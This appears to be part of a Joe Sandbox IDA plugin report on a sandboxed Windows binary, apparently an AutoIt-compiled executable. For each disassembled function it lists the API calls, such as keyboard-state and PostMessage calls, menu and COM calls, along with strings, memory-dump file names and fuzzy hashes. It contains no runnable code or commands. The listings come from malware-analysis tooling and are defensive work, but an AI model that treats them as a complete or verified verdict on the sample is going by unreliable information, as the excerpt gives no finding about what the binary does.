APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0022BCFD
IsMenu.USER32(00000000), ref: 0022BD1D
CreatePopupMenu.USER32 ref: 0022BD53
GetMenuItemCount.USER32(014E5D00), ref: 0022BDA4
InsertMenuItemW.USER32(014E5D00,?,00000001,00000030), ref: 0022BDCC

Strings

2, xrefs: 0022BD37
0, xrefs: 0022BCA8

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: 2fa003c478103cbfc45c232780722b7297e13d28ae60f1145f6529e39c7722d8
Instruction ID: 8524e4fbb6292a3738d31c877a943408babb955bf213c9192aac945bc4bee550
Opcode Fuzzy Hash: 2fa003c478103cbfc45c232780722b7297e13d28ae60f1145f6529e39c7722d8
Instruction Fuzzy Hash: B151BF70A10326BBDF12CFE8E888BEEBBF4BF45314F244159E451A7291E7B09961CB51

Function 0022C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 0022C913

Strings

question, xrefs: 0022C8CC
info, xrefs: 0022C8B4
stop, xrefs: 0022C8E4
warning, xrefs: 0022C8FC
blank, xrefs: 0022C895

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 041e1db47e035b137c40b805964b20f9fc1597dedc3f91c609d0e29d6652e54e
Instruction ID: d74bffd0dbc5aade8e6884da361ef547e4992b0adb46c61ff098aac4414f4ad9
Opcode Fuzzy Hash: 041e1db47e035b137c40b805964b20f9fc1597dedc3f91c609d0e29d6652e54e
Instruction Fuzzy Hash: 61110B356A9727BAA7016B94BC82DBE679CDF15725B30002AF500A72C1E7B05D505269

Function 0022ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0022ED2A
_wcslen.LIBCMT ref: 0022ED3B
_wcslen.LIBCMT ref: 0022ED79
_wcslen.LIBCMT ref: 0022EDAF
_wcslen.LIBCMT ref: 0022EDDF
_wcslen.LIBCMT ref: 0022EDEF
_wcslen.LIBCMT ref: 0022EE2B
_wcslen.LIBCMT ref: 0022EE5A

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: 021c7513f629fb42b6ae9bbe4a9d70fb93f9f4b49143de163298f1a0c183f0dd
Instruction ID: 78ec8c8ba528d390be07d57131c9b12f01cadaecd83a8fec787d2c10b651ac24
Opcode Fuzzy Hash: 021c7513f629fb42b6ae9bbe4a9d70fb93f9f4b49143de163298f1a0c183f0dd
Instruction Fuzzy Hash: 5F41D365C1066976CB11EBF5988AACFB3ACAF25310F518462F614F3122FB34E255C3E6

Function 001DF8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0021682C,00000004,00000000,00000000), ref: 001DF953
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0021682C,00000004,00000000,00000000), ref: 0021F3D1
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0021682C,00000004,00000000,00000000), ref: 0021F454

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 6c924359380a1844335b5a1ff07103769bf096defc50cc7d14bc374cffd09237
Instruction ID: 094ac483624b61d001791cecbfffcb41b3ea68b2569ad4430365849e980595ee
Opcode Fuzzy Hash: 6c924359380a1844335b5a1ff07103769bf096defc50cc7d14bc374cffd09237
Instruction Fuzzy Hash: 57414C30914780BED77D8F2999AC76A7BD1AB55318F14403EF05B56760D7719AC2CB10

Function 00252D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00252D1B
GetDC.USER32(00000000), ref: 00252D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00252D2E
ReleaseDC.USER32(00000000,00000000), ref: 00252D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00252D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00252D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00255A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00252DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00252DE1

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: ec24e54333617559c9aabe76636eaa07be6ca03c5231434a8cc674a50a8f09f7
Instruction ID: f580288ac85c20d23f7aeda60b8be4fcf807858588e6a80a1803625f7c680311
Opcode Fuzzy Hash: ec24e54333617559c9aabe76636eaa07be6ca03c5231434a8cc674a50a8f09f7
Instruction Fuzzy Hash: BA31AB72211310BFEB148F10DC8AFEB3BADEB4A712F044055FE089A291D6758C54CBA8

Function 00225622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00225637
_memcmp.LIBVCRUNTIME ref: 00225659
_memcmp.LIBVCRUNTIME ref: 00225671
_memcmp.LIBVCRUNTIME ref: 00225684
_memcmp.LIBVCRUNTIME ref: 0022569E
_memcmp.LIBVCRUNTIME ref: 002256B1
_memcmp.LIBVCRUNTIME ref: 002256C9
_memcmp.LIBVCRUNTIME ref: 002256E4

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: ec147e19d3b9b34ba076515dd471715fb356a3a321b096e610e1d483f61f983a
Instruction ID: 4494b00044dcd757f48fe2df523fe449edb0101bb2e17ba2bde47adfc31ec859
Opcode Fuzzy Hash: ec147e19d3b9b34ba076515dd471715fb356a3a321b096e610e1d483f61f983a
Instruction Fuzzy Hash: 32212571A70E7A7792189961AE82FBF334DAF21396F488031FD049A585F770ED3481A8

Function 00244FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00245007
NULL Pointer assignment, xrefs: 0024502E, 00245383

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: c0b87a99cf3c1da1234bae48bb5c67449889ec90b38360e32be984ad5de9ddd8
Instruction ID: 997fcf69abf874463165f6a633b0d2793f780f67cbea63be6310c6ea91a6d587
Opcode Fuzzy Hash: c0b87a99cf3c1da1234bae48bb5c67449889ec90b38360e32be984ad5de9ddd8
Instruction Fuzzy Hash: 53D1D375A1071AAFDF14CF98C880FAEB7B5BF48344F148069E959AB282E7B0DD51CB50

Function 00201522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 002015CE
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00201651
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 002016E4
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 002016FB

Part of subcall function 001F3820: RtlAllocateHeap.NTDLL(00000000,?,00291444,?,001DFDF5,?,?,001CA976,00000010,00291440,001C13FC,?,001C13C6,?,001C1129), ref: 001F3852

MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00201777
__freea.LIBCMT ref: 002017A2
__freea.LIBCMT ref: 002017AE

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: c9d0570bc63c4edf3a41ea3c1e4d4afb43ac2eed5978e86ed75e25d24544327d
Instruction ID: 74ad6c270e8e82e02713d2ad67c2fb4ff0f5ba210ecf65edd94880f22b4cf629
Opcode Fuzzy Hash: c9d0570bc63c4edf3a41ea3c1e4d4afb43ac2eed5978e86ed75e25d24544327d
Instruction Fuzzy Hash: 7091B471E203169FDB208E64CC85AEEBBB9AF49310F584659E905EB1D2D735DC70CB60

Function 00244523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00244648
VariantInit.OLEAUT32(?), ref: 00244749
VariantClear.OLEAUT32(?), ref: 00244753
VariantClear.OLEAUT32(?), ref: 002447B0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 0024472C
Null Object assignment in FOR..IN loop, xrefs: 002445D8, 00244706, 002447BE

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 307c945ceb12c0c3715cb4950e2689caa81a8b6ac2ba8cd8475290420c9e1c77
Instruction ID: 8395b91bef243e90dcf32dde4893bc22e28e210fdb6814de8046c531f8c9b48c
Opcode Fuzzy Hash: 307c945ceb12c0c3715cb4950e2689caa81a8b6ac2ba8cd8475290420c9e1c77
Instruction Fuzzy Hash: 5F91A571A10215AFDF28EFA4CC88FAEB7B8EF46714F108559F515AB280D7709951CFA0

Function 00231187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0023125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00231284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 002312A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 002312D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0023135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 002313C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00231430

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: 51c783bde1d4883dd72e5a764181cb70460495d0f74fd3d1c238c26cea7aab86
Instruction ID: b1802717038773773746f731794d343108bb01756482188a1ad510de8d1c29c0
Opcode Fuzzy Hash: 51c783bde1d4883dd72e5a764181cb70460495d0f74fd3d1c238c26cea7aab86
Instruction Fuzzy Hash: C491E3B1A202199FEB00DF98D885BBE77B5FF44715F10402AE911E7291D774E961CB90

Function 001D948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: f299cb3dbb08b7c7985c70b283b2d6658a7bfd6ca53c4f2c59a8fff99d05a550
Instruction ID: 7f632c3bd7bcbf1614cce2c09982e64c6833b9947a9e8c8a6246ec0bb4047cca
Opcode Fuzzy Hash: f299cb3dbb08b7c7985c70b283b2d6658a7bfd6ca53c4f2c59a8fff99d05a550
Instruction Fuzzy Hash: 37913971D00219EFCB14CFA9DC88AEEBBB8FF89320F148556E515B7251D374AA52CB60

Function 00243947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0024396B
CharUpperBuffW.USER32(?,?), ref: 00243A7A
_wcslen.LIBCMT ref: 00243A8A
VariantClear.OLEAUT32(?), ref: 00243C1F

Part of subcall function 00230CDF: VariantInit.OLEAUT32(00000000), ref: 00230D1F
Part of subcall function 00230CDF: VariantCopy.OLEAUT32(?,?), ref: 00230D28
Part of subcall function 00230CDF: VariantClear.OLEAUT32(?), ref: 00230D34

Strings

AUTOIT.ERROR, xrefs: 00243A80, 00243A85
Incorrect Parameter format, xrefs: 002439A6, 00243BA1

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: 3e23d54ace571641756628f0974517556be612eb6cee699b130daf0a2d391180
Instruction ID: c292e5d372d089245d4b5db1f82963f357975e86b789ea537052a76f1a6a2d4f
Opcode Fuzzy Hash: 3e23d54ace571641756628f0974517556be612eb6cee699b130daf0a2d391180
Instruction Fuzzy Hash: FD9145746183059FC704EF64C485A6AB7E5FF98314F14882EF88A9B391DB30EE15CB92

Function 00244BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 0022000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0021FF41,80070057,?,?,?,0022035E), ref: 0022002B
Part of subcall function 0022000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0021FF41,80070057,?,?), ref: 00220046
Part of subcall function 0022000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0021FF41,80070057,?,?), ref: 00220054
Part of subcall function 0022000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0021FF41,80070057,?), ref: 00220064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00244C51
_wcslen.LIBCMT ref: 00244D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00244DCF
CoTaskMemFree.OLE32(?), ref: 00244DDA

Strings

NULL Pointer assignment, xrefs: 00244E23, 00244E52

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 4d1fdcad2731df26623200f63529c95722f6bc60adb8f587bcb51ca47148eadf
Instruction ID: 76ab0e07a4900ef5148d5fc95b0c33116f4042b27d392873c5a91e01e9a46128
Opcode Fuzzy Hash: 4d1fdcad2731df26623200f63529c95722f6bc60adb8f587bcb51ca47148eadf
Instruction Fuzzy Hash: 72914671D1021DAFDF15EFA4D881EEEB7B8BF18304F10416AE915AB241EB709A54CFA0

Function 002520FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00252183
GetMenuItemCount.USER32(00000000), ref: 002521B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 002521DD
_wcslen.LIBCMT ref: 00252213
GetMenuItemID.USER32(?,?), ref: 0025224D
GetSubMenu.USER32(?,?), ref: 0025225B

Part of subcall function 00223A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00223A57
Part of subcall function 00223A3D: GetCurrentThreadId.KERNEL32 ref: 00223A5E
Part of subcall function 00223A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002225B3), ref: 00223A65

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 002522E3

Part of subcall function 0022E97B: Sleep.KERNEL32 ref: 0022E9F3

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 9611755b3f684b6324334ccb9b16022d3cc9b5715d6929e9a2745ff1371dcb7d
Instruction ID: 02efa6b7beef171683aca678d6e6dc134e27a376d8c81c0cecb2798de4325615
Opcode Fuzzy Hash: 9611755b3f684b6324334ccb9b16022d3cc9b5715d6929e9a2745ff1371dcb7d
Instruction Fuzzy Hash: EF719E35A10205EFCB10DFA4C885AAEB7B5EF59311F108459E81AEB381D734EE498B94

Function 0022AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0022AEF9
GetKeyboardState.USER32(?), ref: 0022AF0E
SetKeyboardState.USER32(?), ref: 0022AF6F
PostMessageW.USER32(?,00000101,00000010,?), ref: 0022AF9D
PostMessageW.USER32(?,00000101,00000011,?), ref: 0022AFBC
PostMessageW.USER32(?,00000101,00000012,?), ref: 0022AFFD
PostMessageW.USER32(?,00000101,0000005B,?), ref: 0022B020

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 12befff22f02ee20c98431a3abb8ffee3f6c75e7ebc2a339b0fb6ec6463ddc93
Instruction ID: 0fbe4dacc2c0c3f37a5a431cb0216dfdb6781f830abc1eeb2263cd4e0257882a
Opcode Fuzzy Hash: 12befff22f02ee20c98431a3abb8ffee3f6c75e7ebc2a339b0fb6ec6463ddc93
Instruction Fuzzy Hash: 405125A0A247E23EFB3746B49C05BBA7FE95B06304F088589E1D845CC2D3D9ADE4D751

Function 0022ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 0022AD19
GetKeyboardState.USER32(?), ref: 0022AD2E
SetKeyboardState.USER32(?), ref: 0022AD8F
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0022ADBB
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0022ADD8
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0022AE17
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0022AE38

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 877fa7f3c74c786e941bf88a6750e9e3e2d2ed0a3700ae81702a6f5e20609b25
Instruction ID: e5e6647c665924386370dec3546afd60cfac500a885a4adedc916d0a393b5a82
Opcode Fuzzy Hash: 877fa7f3c74c786e941bf88a6750e9e3e2d2ed0a3700ae81702a6f5e20609b25
Instruction Fuzzy Hash: 065129A09247F23EFB374BB4AC45B7ABF985B45300F088598E1D546CC3D294ECA4D752

Function 001F542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00203CD6,?,?,?,?,?,?,?,?,001F5BA3,?,?,00203CD6,?,?), ref: 001F5470
__fassign.LIBCMT ref: 001F54EB
__fassign.LIBCMT ref: 001F5506
